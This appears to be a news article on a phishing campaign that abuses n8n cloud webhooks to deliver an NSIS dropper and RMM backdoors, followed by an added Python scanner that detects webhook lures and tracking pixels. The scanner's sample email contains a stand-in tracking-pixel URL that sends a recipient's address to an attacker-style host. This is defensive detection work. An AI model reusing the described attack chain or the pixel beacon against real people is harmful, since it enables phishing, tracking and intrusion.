A hacker group is using n8n webhooks to deliver malware by email.
The group has been using n8n webhooks to send malware through phishing emails for a long time, since 2025.
Sending deceptive emails, phishing, is the classic way of getting malware onto victims' machines. Most people would assume this is done with the usual mass-mailing tools built for the purpose. In fact, a tool that few would expect to be used this way has now been put to that use.
According to a report on The Hacker News, the hackers behind this phishing campaign have been using n8n, a tool for building workflows that automate AI (artificial intelligence) tasks. In these campaigns it is used to create a webhook: a mechanism that automatically sends data from a source to a destination in response to a request, so that an application wired to the webhook reacts to an event defined in the workflow. The cooperating application in this case is, of course, the malware itself.
The campaign begins with the hackers sending an email containing an n8n webhook link disguised as an archive attachment. When the victim opens it, the link leads to a CAPTCHA screen; once the victim completes it, a dropper in the NSIS (Nullsoft Scriptable Install System) format is downloaded and installed. The malware establishes persistence by registering a malicious DLL and an associated service, guaranteeing that it resumes every time the machine is rebooted. The final step runs a PowerShell script that downloads MSI installers for tools such as Datto and ITarian Endpoint Management. These two tools are for Remote Monitoring and Management (RMM) and act as the backdoor, connecting to a C2 (Command and Control) server through which the hackers can log in at any time.
A research team from Cisco Talos, the research unit of network specialist Cisco, explained that the hackers use subdomains under n8n's .app.n8n[.]cloud as the receiver for requests from the webhook embedded in the phishing email. Once a request arrives, it triggers the workflow the hackers set up on n8n, which delivers the malware as described above. But n8n webhooks have another capability: "fingerprinting". By simply embedding an invisible image or a tracking code whose source is an n8n-generated webhook URL, the attackers cause the victim's mail client to send an HTTP GET request back to the webhook when the email is opened, carrying identifying information such as the victim's email address, which automatically reveals who opened the message.
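The two indicators the article describes, a webhook link under an .app.n8n.cloud subdomain disguised as an attachment, and a hidden image whose GET request carries the recipient's address, can both be checked for at the mail gateway or in web proxy logs. The following scanner is an added example written for this page; it is not code from The Hacker News, Cisco Talos or the n8n project. The host suffix comes from the article; the /webhook/ path prefix is an assumption about n8n's URL convention, and the sample email body and proxy log lines are constructed, with made-up tenant names and addresses.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse, parse_qs

# Host suffix from the article; the /webhook/ (or /webhook-test/) path prefix
# is an assumption about how n8n exposes webhook receivers.
N8N_HOST_SUFFIX = ".app.n8n.cloud"
WEBHOOK_PATH_RE = re.compile(r"^/webhook(?:-test)?/", re.I)
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[A-Za-z]{2,}$")

# Constructed sample message body (tenant name, paths and addresses are made up).
SAMPLE_HTML = """
<html><body>
<p>Your invoice is attached.</p>
<a href="https://example-tenant.app.n8n.cloud/webhook/abc123?f=invoice.zip">invoice_2025.zip</a>
<img src="https://example-tenant.app.n8n.cloud/webhook/open?e=victim%40example.org"
     width="1" height="1" style="display:none">
<img src="https://cdn.example.com/logo.png" width="120" height="40">
</body></html>
"""

# Constructed proxy log lines in a simple "client method url status" layout.
SAMPLE_PROXY_LOG = [
    "10.0.0.12 GET https://example-tenant.app.n8n.cloud/webhook/open?e=victim%40example.org 200",
    "10.0.0.12 GET https://cdn.example.com/logo.png 200",
    "10.0.0.15 GET https://example-tenant.app.n8n.cloud/webhook/abc123?f=invoice.zip 200",
]


def is_n8n_webhook(url: str) -> bool:
    """True when the URL points at an n8n cloud webhook receiver."""
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    return host.endswith(N8N_HOST_SUFFIX) and bool(WEBHOOK_PATH_RE.match(parsed.path))


def leaks_email(url: str) -> bool:
    """True when any query-string value is an e-mail address (the fingerprint)."""
    query = parse_qs(urlparse(url).query)  # parse_qs also percent-decodes %40 -> @
    return any(EMAIL_RE.match(v) for values in query.values() for v in values)


def looks_hidden(attrs: dict) -> bool:
    """Tracking-pixel heuristic: 1x1 (or 0-sized) image, or hidden via CSS."""
    tiny = attrs.get("width", "").strip() in ("0", "1") or attrs.get("height", "").strip() in ("0", "1")
    style = attrs.get("style", "").replace(" ", "").lower()
    return tiny or "display:none" in style or "visibility:hidden" in style


class _Extractor(HTMLParser):
    """Collects <a href> links (with their visible text) and <img src> tags."""

    def __init__(self):
        super().__init__()
        self.links = []    # (url, anchor text)
        self.images = []   # (url, attribute dict)
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "a" and "href" in a:
            self._href, self._text = a["href"], []
        elif tag == "img" and "src" in a:
            self.images.append((a["src"], a))

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def scan_email_html(html: str) -> list:
    """One finding per n8n webhook URL in the body: disguised link or tracking pixel."""
    ex = _Extractor()
    ex.feed(html)
    findings = []
    for url, text in ex.links:
        if is_n8n_webhook(url):
            findings.append({"kind": "webhook_link", "url": url,
                             "anchor_text": text, "leaks_email": leaks_email(url)})
    for url, attrs in ex.images:
        if is_n8n_webhook(url):
            kind = "tracking_pixel" if looks_hidden(attrs) else "webhook_image"
            findings.append({"kind": kind, "url": url,
                             "anchor_text": "", "leaks_email": leaks_email(url)})
    return findings


def scan_proxy_log(lines) -> list:
    """Flag outbound GETs to n8n webhooks: the open beacons and link clicks."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 4:
            continue
        client, method, url = parts[0], parts[1], parts[2]
        if method == "GET" and is_n8n_webhook(url):
            hits.append({"client": client, "url": url, "leaks_email": leaks_email(url)})
    return hits


if __name__ == "__main__":
    for f in scan_email_html(SAMPLE_HTML):
        print("email:", f)
    for h in scan_proxy_log(SAMPLE_PROXY_LOG):
        print("proxy:", h)
```

An anchor whose text looks like an archive file name but whose href is a webhook URL is exactly the "attachment" lure the article describes; a hit in the proxy log with `leaks_email` set shows that a recipient's mail client has already rendered the tracking pixel, so that address should be treated as confirmed on the attackers' target list even if nothing was clicked.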